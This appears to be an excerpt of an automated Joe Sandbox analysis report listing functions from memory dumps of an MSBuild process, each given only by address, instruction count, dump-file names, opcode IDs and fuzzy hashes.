                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 83207e3b6a46893abef81eabd338eda50a795bcc49a99cabc2831b564b4ebe4b
                                                                                                                                                                                                                                                • Instruction ID: 8fa905bf647e969e1fa5e48bce8a776f22fc6543d1d5fcbfe3660e65c3897303
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83207e3b6a46893abef81eabd338eda50a795bcc49a99cabc2831b564b4ebe4b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DA14A746003069FC745DF64D8849A9BBF2FF89220B148A98E54A8B762DB70FD49CF91
                                                                                                                                                                                                                                                Function 072AF1F0 Relevance: .2, Instructions: 227COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 08c35c11ac800a04d85e4bd47cafef1e7611a39b2651cb43f426f57b87ebbcc5
                                                                                                                                                                                                                                                • Instruction ID: 634bf33e3f1c91eb14346cd1fd33576beb69b61e5b5b107d22a0381a021ff9a4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08c35c11ac800a04d85e4bd47cafef1e7611a39b2651cb43f426f57b87ebbcc5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 957123B1B24263AFDB199B75C9503BE7BE2AF85301F04447AE546CB280EB7DC905D790
                                                                                                                                                                                                                                                Function 0709E230 Relevance: .2, Instructions: 213COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6334a37c5a12e9dd41238a4c5f779b5c4d5f79cb91b26dd52f95e715be547eec
                                                                                                                                                                                                                                                • Instruction ID: 5a8572b995f215a19163569910abd88e7077a152600ea3e56a037e058bd22c8b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6334a37c5a12e9dd41238a4c5f779b5c4d5f79cb91b26dd52f95e715be547eec
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB815DB5B00216DFCB04DFA8C4849AEBBF5FF89610B1585AAE915DB361D730ED41CBA0
                                                                                                                                                                                                                                                Function 072A7600 Relevance: .2, Instructions: 207COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a06437a5f5c9fd814d44b0388aeb0f23b8b48da5caa0abe5fd00544106af6337
                                                                                                                                                                                                                                                • Instruction ID: 404c9f7582fc0884bb29014cd1ce8a74f26433a70c4be33784f96583981af264
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a06437a5f5c9fd814d44b0388aeb0f23b8b48da5caa0abe5fd00544106af6337
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C18169B0610306EFCB15DF28D880AAABBF2BF85310B008969E546CB791DB70ED45CB95
                                                                                                                                                                                                                                                Function 071B11D8 Relevance: .2, Instructions: 205COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d0d6b110761d4fd41f08f082098ebd89d28cc9c06a681cebabf1892438d078f9
                                                                                                                                                                                                                                                • Instruction ID: 3da73a4bcf9b0cc0b406e9bbac129b16585a8101811bd1837e4b5c440541286d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0d6b110761d4fd41f08f082098ebd89d28cc9c06a681cebabf1892438d078f9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF718F75A00209EFCB01DFA9D8849EEFBF6FF88310F14816AE915E7251D731A945CBA0
                                                                                                                                                                                                                                                Function 0711F418 Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 127b42f02cb012330282e5f4d915e5d18789d7e59be23e572b245344683bca27
                                                                                                                                                                                                                                                • Instruction ID: 8b4994f2f34be9ffc4386742f738f8f37ffbc58ac075f0daed972d2aa8ec8d2c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 127b42f02cb012330282e5f4d915e5d18789d7e59be23e572b245344683bca27
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9819EB060270A9FDB65CF64C544AAAB7F6FF84214F148639D806CB7A1DB34E906CF91
                                                                                                                                                                                                                                                Function 07119DFF Relevance: .2, Instructions: 193COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 052af10c77e4e42893d7591a79f25aaef0061ed2911edd683745ca519d436237
                                                                                                                                                                                                                                                • Instruction ID: fb16fe603a74522979ab89954a01bc3031dddeb79c02e77cceb08ccbe146d420
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 052af10c77e4e42893d7591a79f25aaef0061ed2911edd683745ca519d436237
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36619CB4B053059FDB05DF74D898AAEBBB2FF88300F158129E906DB391DB349D018BA5
                                                                                                                                                                                                                                                Function 07091D81 Relevance: .2, Instructions: 189COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8ae2f46f025a28afb2e03c4a120dc9e38368db44fa746f79e8ace5613511e05e
                                                                                                                                                                                                                                                • Instruction ID: 0429c681c0633e961ba5f3cbf12a9b332be91c693fb7872a13a80968a31e0cf9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ae2f46f025a28afb2e03c4a120dc9e38368db44fa746f79e8ace5613511e05e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A481BF78E01218DFDB55DFA9D890A9DBBF2FF88300F10816AD909AB354DB30A945DF90
                                                                                                                                                                                                                                                Function 07115E89 Relevance: .2, Instructions: 187COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1c61017e36771609eb623fcb8b4a466ec62b31d2ecf62b825c4109ee4b218d64
                                                                                                                                                                                                                                                • Instruction ID: b1057b02828b454cb67a4fe7067d0c29a38700c0238d089fd25d49ae8ca3d4f3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c61017e36771609eb623fcb8b4a466ec62b31d2ecf62b825c4109ee4b218d64
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B716BB0A106099FCB15DFA4C9949AEB7F2BF84710B148569E80AAF394DF71ED05CF90
                                                                                                                                                                                                                                                Function 071BCE88 Relevance: .2, Instructions: 187COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8b288a6b649546724e0f9a4a23215eae51e68e13f9ec333865daeb51fbc3e970
                                                                                                                                                                                                                                                • Instruction ID: e2db4f13c63e622e0cdc0f3c254035a0789e48dbed1375819b22e65ebb0c95e0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b288a6b649546724e0f9a4a23215eae51e68e13f9ec333865daeb51fbc3e970
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00615EB07002059FDB24DF65E898AADBBF5EF89314F148169E405EB3A1DB31EC41CBA5
                                                                                                                                                                                                                                                Function 071187E0 Relevance: .2, Instructions: 186COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: fa6e39d7b9e0c004b9007933e4c92c112c41c381c5cab98f2bd333a0a9dc22f2
                                                                                                                                                                                                                                                • Instruction ID: 4f5fa6fa04a583da0b8370bd44613be32d8257e4e7d02c257328808587e38026
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa6e39d7b9e0c004b9007933e4c92c112c41c381c5cab98f2bd333a0a9dc22f2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F361CBB1B002058FDB15DF78D884AAEBBF2AFC8220B14C169D5169B7A4DF30EC01CB91
                                                                                                                                                                                                                                                Function 0709D068 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 009290cab541e7a1cd6b594d9dff387928693ee1cc5867fff733537ae98e2ac9
                                                                                                                                                                                                                                                • Instruction ID: 766a0c3f95fdb331dd7d0d645922506f0e32f4def70f3973e1e31e453f527ed2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 009290cab541e7a1cd6b594d9dff387928693ee1cc5867fff733537ae98e2ac9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F46140B0B402169FDF54DF69C850AAEB7F6AF88610B148269D906EB354DB30DC01CBA0
                                                                                                                                                                                                                                                Function 070958A0 Relevance: .2, Instructions: 181COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 48c743bdcd9c10c5339ea9322492883141fa046f13519b8a8e951b5186dc5390
                                                                                                                                                                                                                                                • Instruction ID: 2ddfe6cad3326ebfe7508615b19f489e041bf7669ae7c9d87371ffdc32f28ad8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48c743bdcd9c10c5339ea9322492883141fa046f13519b8a8e951b5186dc5390
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2618B7060020AAFDB01DF58D880AAEFBF6FF84220B14C669D5599B251DB31FD068FA5
                                                                                                                                                                                                                                                Function 0711F228 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c8b747eb53cdbce935e892f0daf8f9ae0ea4183cd950abff147d4533b33d28e6
                                                                                                                                                                                                                                                • Instruction ID: 735861e7e2934e2094d54b130db8764fb61e7fd6228de66301de73a409ef1c8c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8b747eb53cdbce935e892f0daf8f9ae0ea4183cd950abff147d4533b33d28e6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1361C4B4A012598FDB54CFA9C880A9EBBF6BF88310F14416AE919EB354D731D942CF50
                                                                                                                                                                                                                                                Function 07091D90 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d2ac3f6057c83abdcca753740044e53103b843a9b4b300160e20c0dabbc05a9f
                                                                                                                                                                                                                                                • Instruction ID: f5e0642a7efda60ca12401447c826cd04edbe276669622964d9bd5dd526c8b87
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2ac3f6057c83abdcca753740044e53103b843a9b4b300160e20c0dabbc05a9f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC819178E00218CFDB55DFA9D990A9DBBF2FF88310F10816AD919AB354DB30A945DF90
                                                                                                                                                                                                                                                Function 0711F408 Relevance: .2, Instructions: 163COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 260c13bca9f0ec2feb5e3afe6934a9e6affc1ad9519c80a1b1d427a0f188b044
                                                                                                                                                                                                                                                • Instruction ID: 00af0ab9afa0c0c083a4a6ac312be91105a00e53fc01c8bd1f6641cf2d41f18e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 260c13bca9f0ec2feb5e3afe6934a9e6affc1ad9519c80a1b1d427a0f188b044
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA518FB06027079FDB61CF68C444AAAB7F6FF84310F158639D845CB2A1DB74E946CB91
                                                                                                                                                                                                                                                Function 0709607F Relevance: .2, Instructions: 162COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 013796d4d36359ff3666cb7a55868200640e2cbf00b9807fba047ca2b4fc61ce
                                                                                                                                                                                                                                                • Instruction ID: f626c9a7738eeb93b5167885b4186772ccf744583e4c999b68d3f4f4a5cbd39d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 013796d4d36359ff3666cb7a55868200640e2cbf00b9807fba047ca2b4fc61ce
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C15190701107406FE351EF34D890BDABBE2AF81320F548A59D1468F692DB65AE0DCF9A
                                                                                                                                                                                                                                                Function 0709F130 Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 87b3ddd70b83c11d5e2f6ead7510d08f910b84a1cf342089c5f6c87ef3f4323e
                                                                                                                                                                                                                                                • Instruction ID: e8f7ee668eaff1d780a662ca1036b64fdd54b080bef74fb10292385ca6374db4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87b3ddd70b83c11d5e2f6ead7510d08f910b84a1cf342089c5f6c87ef3f4323e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99516DB5B00206DFCB54DFA9D884ADABBF5EF88220B1585AAD515DB361DB30EC41CB90
                                                                                                                                                                                                                                                Function 0711F219 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 51818766174971cb11fd8e68d1da9861bcc37b00eae9a88fb069123ec512c1da
                                                                                                                                                                                                                                                • Instruction ID: d8634c7c0555dd39b26c69a40a0b40febaea29f47a408669d6034c514afd612d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51818766174971cb11fd8e68d1da9861bcc37b00eae9a88fb069123ec512c1da
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A51E6B4A112598FDB54CFA9C880A9EBBF6BF48310F10456AE909EB354E731DD02CF50
                                                                                                                                                                                                                                                Function 054E8308 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1667172186.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_54e0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6fe0ad6ff2cfb4e31c1d12d5a6560ffe658d2c17c8e288454fb542b3cac4957b
                                                                                                                                                                                                                                                • Instruction ID: 1b522bb888809fa23c089c6d3222080be1c6a0066786cc7912737377dd382a75
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6fe0ad6ff2cfb4e31c1d12d5a6560ffe658d2c17c8e288454fb542b3cac4957b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF512735B106089FCB14DF69D894DEEBBB2FF89710B1180AAE905AB361DB31EC05CB50
                                                                                                                                                                                                                                                Function 0711DC78 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: cbce454187918a38b966093ed67e6e94e325c7c8b0160171bbff939df33028f8
                                                                                                                                                                                                                                                • Instruction ID: 6990074e5fa7af2849724f0d472c027e71c2c26b451955519ce4db23bca4ae53
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbce454187918a38b966093ed67e6e94e325c7c8b0160171bbff939df33028f8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0841F4B03147529FDB294B35A800777BBE7AF85211F158939E9C3CB6C0DB68E841CB52
                                                                                                                                                                                                                                                Function 071BCCD8 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: fbd92c93aabdf32e83663504d7cbea833d2cfb1a89c62d2fc52ec82ffb275bcf
                                                                                                                                                                                                                                                • Instruction ID: af5a797f553ba3093f1e77531c1daff9affa3a82d0494e0386ffc03db54dad95
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fbd92c93aabdf32e83663504d7cbea833d2cfb1a89c62d2fc52ec82ffb275bcf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 945181B5600656DFCB22CF68C884AEABBF2FF45320F158595E955EB2D1C730E940CBA0
                                                                                                                                                                                                                                                Function 071B1E18 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: be0287a58cba99ce7a5e845e9cc114427179486d205e338a50f7d0c9798de60c
                                                                                                                                                                                                                                                • Instruction ID: e5ca39f06b075ff82b643b9407f252eee8839e72a4e9d4d5634a5a1d787d029e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be0287a58cba99ce7a5e845e9cc114427179486d205e338a50f7d0c9798de60c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 795126B4A007099FDB25CFA9C884A9DFBF2BF48300F05856AE449AB761D774E845CB40
                                                                                                                                                                                                                                                Function 071B6898 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: be5bd418d607a0b99128844038cebae293e31a62de0e61e172bd26e88489145c
                                                                                                                                                                                                                                                • Instruction ID: b9f4b7876491df9588a50f2fa0384a30c0e9451d105373aa171cf58e1335f0cf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be5bd418d607a0b99128844038cebae293e31a62de0e61e172bd26e88489145c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 865170B4A00305EFCB05DF68C4809AABBF2FF89310B1586A9D459DB362DB31ED45CB91
                                                                                                                                                                                                                                                Function 054E8499 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1667172186.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_54e0000_MSBuild.jbxd
